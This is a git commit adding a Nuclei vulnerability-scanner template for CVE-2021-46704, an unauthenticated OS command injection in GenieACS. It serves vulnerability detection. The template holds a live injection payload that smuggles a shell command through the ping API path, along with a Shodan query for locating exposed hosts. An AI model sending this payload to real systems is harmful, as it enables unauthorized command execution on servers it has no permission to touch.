Merge pull request #7509 from projectdiscovery/CVE-2021-46704

Create CVE-2021-46704.yaml
2023-06-22 12:51:33 +05:30 · 2023-06-22 12:51:33 +05:30 · c9bf9e787e
parent 882a315113 565e5d32de
commit c9bf9e787e
1 changed files with 43 additions and 0 deletions
--- a/http/cves/2021/CVE-2021-46704.yaml
+++ b/http/cves/2021/CVE-2021-46704.yaml
@ -0,0 +1,43 @@
+id: CVE-2021-46704
+
+info:
+  name: GenieACS => 1.2.8 - OS Command Injection
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.
+  reference:
+    - https://twitter.com/shaybt12/status/1671598239835906058
+    - https://github.com/advisories/GHSA-2877-693q-pj33
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46704
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-46704
+    cwe-id: CWE-78
+  metadata:
+    max-request: 1
+    verified: "true"
+    shodan-query: http.favicon.hash:-2098066288
+  tags: cve,cve2021,genieacs,rce
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/ping/;`id`"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "uid=([0-9]+)"
+
+      - type: word
+        part: header
+        words:
+          - text/plain
+
+      - type: status
+        status:
+          - 500